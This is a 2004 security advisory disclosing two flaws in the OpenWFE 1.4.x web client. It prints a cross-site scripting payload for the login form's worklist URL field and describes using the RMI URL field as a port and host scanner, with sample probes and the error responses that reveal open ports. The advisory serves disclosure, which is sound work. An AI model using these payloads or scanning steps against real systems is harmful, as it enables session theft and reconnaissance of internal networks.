Two Vulnerabilities in OpenWFE Web Client
---------------------------------------------------------------------------
Two Vulnerabilities in OpenWFE
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OpenWFE - Open WorkFlow Engine v1.4.x
OpenWFE is an open source java workflow engine.
It is a complete Business
Process Management suite, with 4 components :
an engine, a worklist, a
webclient and a reactor (host for automatic
agents). It can also be used
behind the scene.
Web : http://www.openwfe.org
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting Vulnerability in the 'Login
Form' of the Web Client.
A1. In the login form of the Web Client you has 3
fields :
1.- The URL of the RMI Remote Service
2.- The username
3.- The Password
Well, the URL field is vulnerable to an XSS attack
due to no input validation.
To test the problem follow these steps :
1.- Go to any site that have the OpenWFE
webclient
2.- In the Worklist URL field insert, in example,
the following data :
rmi://localhost:7080/workSessionServer"><script>alert(document.cookie)</script>
or this
rmi://<h1>hi</h1>:7099/workSessionServer
3.- Enter any username and password, and
press the button to login.
B. Possible Port Scanner
B1. The field worklist URL is like this ->
rmi://<hostname>:<port>/location
Due to the Worklist URL parameter's nature is
possible to create a simple port/host
scanner from the perspective of the OpenWFE
host.
Example :
Query -> rmi://server/workSessionServer
Response Time -> 1 second
Response -> Error :
java.rmi.UnknownHostException: Unknown host
Query ->
rmi://localhost:709/workSessionServer
Response Time -> 1 second
Response -> Error :
java.rmi.ConnectException: Connection refused to
host
Query ->
rmi://localhost:7085/workSessionServer
Response Time -> 5 seconds
Response -> Error :
java.rmi.ConnectIOException: error during JRMP
connection establishment
Query ->
rmi://drill.hackerslab.org:23/workSessionServer
Response Time -> Greater that 5 seconds
Response ->
Error : java.rmi.ConnectIOException: non-JRMP
server at remote endpoint
Query -> rmi://192.168.1.2/workSessionServer
Response Time -> Greater than 30 seconds
Response -> No response, no timeout
Depending on the Response Time and the
Response is quite easy to create a simple
port/host scanner.
The fix:
~~~~~~~~
The problems has been fixed in the latest release
of the OpenWFE's web client.
Go to http://www.openwfe.org for more information
about the patch.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its
demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of
using the information or demonstrations provided
in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es